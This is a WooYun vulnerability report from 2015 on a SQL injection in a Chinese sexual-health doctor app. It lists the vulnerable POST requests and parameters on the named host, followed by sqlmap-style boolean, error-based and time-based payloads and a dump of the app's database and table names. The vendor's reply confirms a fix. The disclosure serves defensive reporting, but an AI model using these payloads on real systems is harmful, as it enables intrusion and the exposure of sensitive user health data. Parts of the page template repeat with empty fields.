两性私人医生APP某处SQL注入漏洞(涉及300多万用户信息)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0108400

漏洞标题：两性私人医生APP某处SQL注入漏洞(涉及300多万用户信息)

漏洞作者：几何黑店

提交时间：2015-04-16 17:03

修复时间：2015-06-01 14:18

公开时间：2015-06-01 14:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-16：细节已通知厂商并且等待厂商处理中
2015-04-17：厂商已经确认，细节仅向厂商公开
2015-04-27：细节向核心白帽子及相关领域专家公开
2015-05-07：细节向普通白帽子公开
2015-05-17：细节向实习白帽子公开
2015-06-01：细节向公众公开

简要描述：

两性私人医生APP SQL注入漏洞(涉及300多万用户信息)
~好羞涩~

详细说明：

POST /client/api.php?randnum=0.8167588198557496 HTTP/1.1
Content-Length: 417
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 
Mobile/10A5376e Safari/8536.25
Accept: */*
action=chatnow&doctorid=1&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user

参数:doctorid

POST /client/api.php?randnum=0.0867801399435848 HTTP/1.1
Content-Length: 361
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=login&number=1&password=e&ver=1.3

参数:number

POST /client/api.php?randnum=0.0867801399435848 HTTP/1.1
Content-Length: 362
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=login&number=e&password=admin&ver=1.3

参数:password

POST /api/m.php?randnum=0.8685849541798234 HTTP/1.1
Content-Length: 306
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=chatend&chatid=1

参数:chatid

POST /api/m.php?randnum=0.42485142801888287 HTTP/1.1
Content-Length: 356
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=login&password=e&username=e

参数:password

POST /api/m.php?randnum=0.3527681708801538 HTTP/1.1
Content-Length: 344
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=logout&userid=1

参数:userid

POST /api/m.php?randnum=0.42485142801888287 HTTP/1.1
Content-Length: 354
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=login&password=e&username=admin

参数:username

http://medapp.ranknowcn.com/client/image.php?key=e

参数:key

漏洞证明：

---
Parameter: doctorid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: action=chatnow&doctorid=-5475' OR 4249=4249#&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: action=chatnow&doctorid=-4478' OR 1 GROUP BY CONCAT(0x716a767671,(SELECT (CASE WHEN (1098=1098) THEN 1 ELSE 0 END)),0x71706b7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: action=chatnow&doctorid=1' AND (SELECT * FROM (SELECT(SLEEP(20)))GXDX)#&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user
---
web application technology: Nginx, PHP 5.3.5
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] lucky_draw
[*] medapp

Database: medapp
[160 tables]
+------------------------------+
| lucky_draw.user_bak1         |
| user                         |
| activedate                   |
| addrdetailLog                |
| admin                        |
| adminpage                    |
| advert                       |
| advertType                   |
| answer                       |
| appnews                      |
| assign_percentage            |
| bj_base_station              |
| booking                      |
| chat                         |
| chatFilterWords              |
| chatUpdLog                   |
| chatchange                   |
| chatclose                    |
| chatcomment                  |
| chathistory                  |
| chatlock                     |
| chatsourceLog                |
| chattag                      |
| chattemp                     |
| city                         |
| city2                        |
| city2LAC                     |
| city_baidu                   |
| cityhospital                 |
| cityhospital_keshi           |
| customerlock                 |
| dailyStatement               |
| doctor                       |
| doctorBak                    |
| doctor_autoAssignQuestion    |
| doctor_fastreply             |
| doctor_fastreplyParent       |
| frommsgLog                   |
| gps_addr                     |
| gps_addrtag                  |
| gps_cell                     |
| gps_imei                     |
| gps_ios_vars                 |
| gps_ios_vars_test            |
| gps_m7_data                  |
| gps_move_path                |
| gps_notes                    |
| gps_points                   |
| gps_points_test              |
| gps_pos                      |
| gps_raw_data                 |
| gps_user_pic                 |
| gps_walk_data                |
| gps_wifi                     |
| hospital                     |
| hospitalSellLog              |
| hospitalSellLog_day          |
| hospitalSellLog_month        |
| hospitalSellLog_oldData      |
| hospitalSellLog_sellPrice    |
| hospitalSellLog_updLog       |
| hospitalSellLog_userTelChat  |
| huodong                      |
| huodongReport                |
| importantChatLog             |
| ios_xyz                      |
| ios_xyz2                     |
| ios_xyz2_copy                |
| ios_xyz2_copy1               |
| ios_xyz2_copy2               |
| ios_xyz_feature              |
| ios_xyz_std                  |
| iospush                      |
| iospushmsg                   |
| iospushmsgTemplate           |
| iospushmsgType               |
| iptable                      |
| jihuo                        |
| jihuoCountForDate            |
| jihuo_macaddr                |
| logs_doctor                  |
| logs_doctorlogin             |
| logs_hospital                |
| logs_question                |
| logs_quotaQuetsionUserVerify |
| logs_users                   |
| meiapp_booking               |
| meiapp_category              |
| meiapp_comment               |
| meiapp_favor                 |
| meiapp_intro                 |
| meiapp_mm_offer              |
| meiapp_mm_photo              |
| meiapp_mm_vote               |
| meiapp_news                  |
| meiapp_news_catid            |
| meiapp_newscategory          |
| meiapp_picture               |
| meiapp_project               |
| meiapp_share                 |
| monthlyStatement             |
| office                       |
| online                       |
| publicQuestion               |
| qa_answer                    |
| qa_keyword                   |
| qa_question                  |
| qa_question_answer           |
| qa_type                      |
| question                     |
| questionCountForDate         |
| questionDayNum               |
| questionTop                  |
| questionType                 |
| questionTypeChild            |
| question_all                 |
| question_repeatLog           |
| questionhide                 |
| quotaHospital                |
| quotaQuestion                |
| quotaQuestion2               |
| quotaQuestionSearch          |
| quotaQuestionSearch_wuxiao   |
| quotaQuestion_copy           |
| quotaQuestion_test           |
| record                       |
| record_copy                  |
| regdate                      |
| retention                    |
| retention_week               |
| roles                        |
| sellLog                      |
| sina_weibo_access            |
| syslog                       |
| t_weibo_access               |
| tempCode                     |
| temp_questions               |
| test_activity                |
| uploadFile                   |
| user2                        |
| userAddrdetail               |
| userAlias                    |
| userBlacklist                |
| userContacts                 |
| userDeviceid                 |
| userLeaveWords               |
| userLog                      |
| userVisitLog                 |
| userYanzheng                 |
| user_copy                    |
| user_guahao                  |
| user_guahao_data             |
| user_huoyue                  |
| user_mobilemsg               |
| userhide                     |
| usersource                   |
| weeklyStatement              |
| z_qhp_sell_admin             |
| z_qhp_sell_log               |
| z_qhp_set_selled             |
+------------------------------+

修复方案：

你懂的

版权声明：转载请注明来源几何黑店@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2015-04-17 14:17

厂商回复：

感谢报告，上次清理，有些参数没有处理。现进行了全局传入参数过滤

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0108400

漏洞标题：两性私人医生APP某处SQL注入漏洞(涉及300多万用户信息)

相关厂商：ranknowcn.com

漏洞作者：几何黑店

提交时间：2015-04-16 17:03

修复时间：2015-06-01 14:18

公开时间：2015-06-01 14:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源几何黑店@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0108400

漏洞标题：两性私人医生APP某处SQL注入漏洞(涉及300多万用户信息)

相关厂商：ranknowcn.com

漏洞作者： 几何黑店

提交时间：2015-04-16 17:03

修复时间：2015-06-01 14:18

公开时间：2015-06-01 14:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0108400"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 几何黑店@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：几何黑店

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源几何黑店@乌云